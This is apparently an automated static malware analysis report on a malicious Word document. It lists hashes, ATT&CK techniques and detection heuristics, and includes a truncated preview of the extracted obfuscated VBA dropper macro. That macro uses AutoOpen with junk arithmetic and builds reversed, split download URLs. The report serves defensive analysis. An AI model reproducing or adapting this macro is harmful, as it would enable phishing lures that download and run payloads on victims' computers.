Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2070ccdc16d4bbf2…

MALICIOUS

Office (OLE)

Size: 223.0 KB
First seen: 2018-02-19
MD5: e083e0a82522bedb1678fb66d42e75bb
SHA-1: d4cbc7d662eba95d627c8f2ea9c2231a057a0ea6
SHA-256: 2070ccdc16d4bbf23d00738a905dc114ff8ae2303ea76baab0061858324f2fe7
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing a VBA macro. The macro uses the AutoOpen function and the Shell() function, indicating an attempt to execute arbitrary code. ClamAV detections further confirm its malicious nature as a dropper and phishing lure. The VBA macro is obfuscated, but its intent to execute a payload is clear.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 81857 bytes
SHA-256: 69fcf820191916e90d44279a9aa35005f524a950f6bf7ccdd8f0b451e2371310
Detection: ClamAV: Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iWjWJPS"
Sub AutoOpen()
On Error Resume Next
kdJfEpdOF = 3252751 - Sqr(hOGfMYjNQW * Fix(SktdNzsHGim) + 3909061 / sIpVTzMp) - 1201634 * hZwUUzhufw * LYmacfVz + CDbl(1917879 * Int(8878754) / 8915330 * Tan(8840182)) / mEjLuQJnMLLEQc / CByte(4596507 - CDbl(ZjHYAhjC))
uqUqswfnf = 9478693 - Sqr(QPVAOmTwNbWM * Fix(wpkKmVw) + 992166 / jRDwSvQfXZ) - 3727170 * HsEjtlhiVbYiRs * MVAJwcv + CDbl(6846736 * Int(866509) / 9439246 * Tan(3468441)) / XiiDwsHqzj / CByte(5234351 - CDbl(kRWzEsZfZtEKWQ))
USMIzmbQJ = 122224 - Sqr(XblJCFfuHYhGv * Fix(LXmuiiXjjXp) + 5816349 / jpSTHVMjRnVXn) - 4669228 * PrmLQdnOo * fWPrvNTYQz + CDbl(926028 * Int(7753823) / 1022828 * Tan(5112287)) / jwukQXqFHQpl / CByte(5818131 - CDbl(Ksbizbzwp))
VZCzWYLbl = 2378926 - Sqr(jftdXwoQHaF * Fix(pKGGdJHwmmI) + 4718136 / OYUjvpDY) - 739326 * fzzHwnioOPwM * QShRdNotWUSIa + CDbl(3905174 * Int(6870105) / 2286215 * Tan(7231504)) / ElcbHjC / CByte(1772200 - CDbl(DzuIOCjD))
OOXZLPnIi = 5991545 - Sqr(YSwddNsbMoKBPU * Fix(kvcMDGq) + 3144175 / zOdsWoSdBD) - 7065432 * EURvWaXPEMIEJ * sjRbshCdfOk + CDbl(9896094 * Int(965442) / 4493605 * Tan(4249892)) / ALjIfaLRhfTB / CByte(3242878 - CDbl(GYjrwmLZLDqb))
pCKWVzsXL = 9363727 - Sqr(AwRUAtNOBM * Fix(ILPNajVazjSElJ) + 1202207 / JTItZJDi) - 8577107 * SLjwopOvtzG * ZJBlwniu + CDbl(6258488 * Int(2225436) / 8910391 * Tan(6590767)) / usSVwIh / CByte(4033711 - CDbl(RKuBsdqpPHEBuw))
Application.Run "NLUYVDimiiD", RLzdaAFz
soMPAwwGQ = 9617815 - Sqr(uwvavqZndsrqvv * Fix(EqwndCz) + 8823366 / jlsjWzKtwGz) - 6234099 * PUQfNRGBzRUuuH * dUsuCUtJ + CDbl(9709737 * Int(8552982) / 3219678 * Tan(6171451)) / ztozYJbcWwoi / CByte(7590964 - CDbl(jUYmcpAPcO))
DdZVKRmwl = 4735044 - Sqr(DdWVkfh * Fix(VDLPvKpa) + 1244114 / qhhRZuvjFRELr) - 9563641 * WfqBQrJSJ * LrOiLVrj + CDbl(1665327 * Int(8977275) / 8322224 * Tan(4143412)) / EbaBaQBJLNAY / CByte(5802716 - CDbl(YqwjOYLOCjEtwN))
fjDXAumap = 8171649 - Sqr(CHwzdOGhWTpM * Fix(cwapYtwjU) + 7805832 / cKcXkMzAGzM) - 3383456 * OYSwMZupX * vDTwBvuDhSSXT + CDbl(7165641 * Int(6548261) / 9519527 * Tan(1942707)) / oFQPfMazbz / CByte(3860804 - CDbl(uoFVhTQPwFMuiz))
wrFhQOPYA = 3324598 - Sqr(fYHVCUwjnY * Fix(RzDOjuZjtWl) + 6187224 / jttjFfVno) - 9519534 * vJttkPK * bSZIdCiVzRXBu + CDbl(8568941 * Int(8371902) / 7413642 * Tan(1601080)) / PdICqdzBSXA / CByte(6028819 - CDbl(iLtFzJlPiXKWWQ))
vICRHlJzh = 6755471 - Sqr(bwIcjKUUSt * Fix(AntdXLlGwjUND) + 8639435 / FttpiiKjV) - 2518621 * muMpCDXGHPX * OwOaksHjEjT + CDbl(989227 * Int(5226202) / 5074258 * Tan(5634398)) / LpGYQuYrt / CByte(1653083 - CDbl(QpzlAhPfqQD))
ZnOdXDaHO = 5332630 - Sqr(IuSIzOUZWhc * Fix(rtHwSXLvm) + 9609761 / QSJmWVQm) - 8884543 * qjCSshB * QtWzZXkQ + CDbl(825167 * Int(1447742) / 6916433 * Tan(465977)) / nLnCppbzEFu / CByte(6570041 - CDbl(BNEfapKk))
End Sub
Function RLzdaAFz()
On Error Resume Next
qwLQJ = ("cwrJeQx+eQxceQx+eQxa'+'eQx+eQx//:peQx+eQxtteQx+e'+'Qxh?/kJ3wEe/moceQx+eQx.pohseQx+e'+'QxirteQx+eQxap//DZitmPGAqnm")
uYTTC = 9875772 - Sqr(LcjrBiz * Fix(FiFzPmcjS) + 5710793 / TMiWbiqjiGk) - 4834923 * MPzhfYd * zQwACfniN + CDbl(7758422 * Int(4583690) / 4417256 * Tan(6881596)) / nhFEILwSKVJ / CByte(416470 - CDbl(ApuDtzRUvfWY))
GViij = 533090 - Sqr(zQSMCTj * Fix(QbbQSOjGcqA) + 8906389 / tTkiXSLrBjjG) - 1583944 * BsJHjFZ * ScdhDnpDfX + CDbl(1626700 * Int(3074142) / 799501 * Tan(9499630)) / hiAUjPsvKKNi / CByte(2762942 - CDbl(jRpNVBIBq))
aWzOjrj = Mid(qwLQJ, 5, 98)
XiYuNKLwvS = ("V?eQx+eQx/POeQx+eQxdCm/eQx+eQxmoceQx+eQx.sseQx+eQxecorp-eQx+eQxdraobeQx+eQxno//:p'+'tteQx+eQxh?/FszkXLVLCHOjpFcDvoWjGq")
BkuHqRFaVMr = 474799 - Sqr(licDRSwSnRQU * Fix(jcPCjDXRiQLqn) + 7512926 / SkHBpEJYbTREuX) - 6885760 * OCfRVFJACfPGSQ * ifzzCKOil + CDbl(4465664 * Int(808238) / 7627818 * Tan(6576659)) / wcuvTznIV / CByte(5372122 - CDbl(bGwKpCGLG))
TiqwWjZNTQU = 74438
... (truncated)